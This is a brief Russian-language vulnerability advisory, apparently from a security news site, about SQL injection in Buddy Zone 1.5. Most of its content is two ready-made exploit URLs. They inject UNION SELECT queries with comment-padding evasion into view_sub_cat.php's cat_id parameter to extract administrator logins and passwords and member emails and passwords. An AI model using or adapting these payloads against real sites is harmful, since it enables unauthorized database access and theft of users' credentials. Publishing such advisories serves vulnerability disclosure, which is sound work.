Программа: Buddy Zone Version 1.5

Уязвимость позволяет удаленному
пользователю выполнить произвольные SQL
команды в базе данных приложения.

Примеры:

http://www.site.com/view_sub_cat.php?cat_id=-1/* */UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,
admin_user,0x3a,admin_password,0x3C62723E), 4/**/FROM/**/admin_users/*

http://www.site.com/view_sub_cat.php?cat_id=-1/* */UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,
member_email,0x3a,member_password,0x3C62723E), 4/**/FROM/**/members/*

Оставить мнение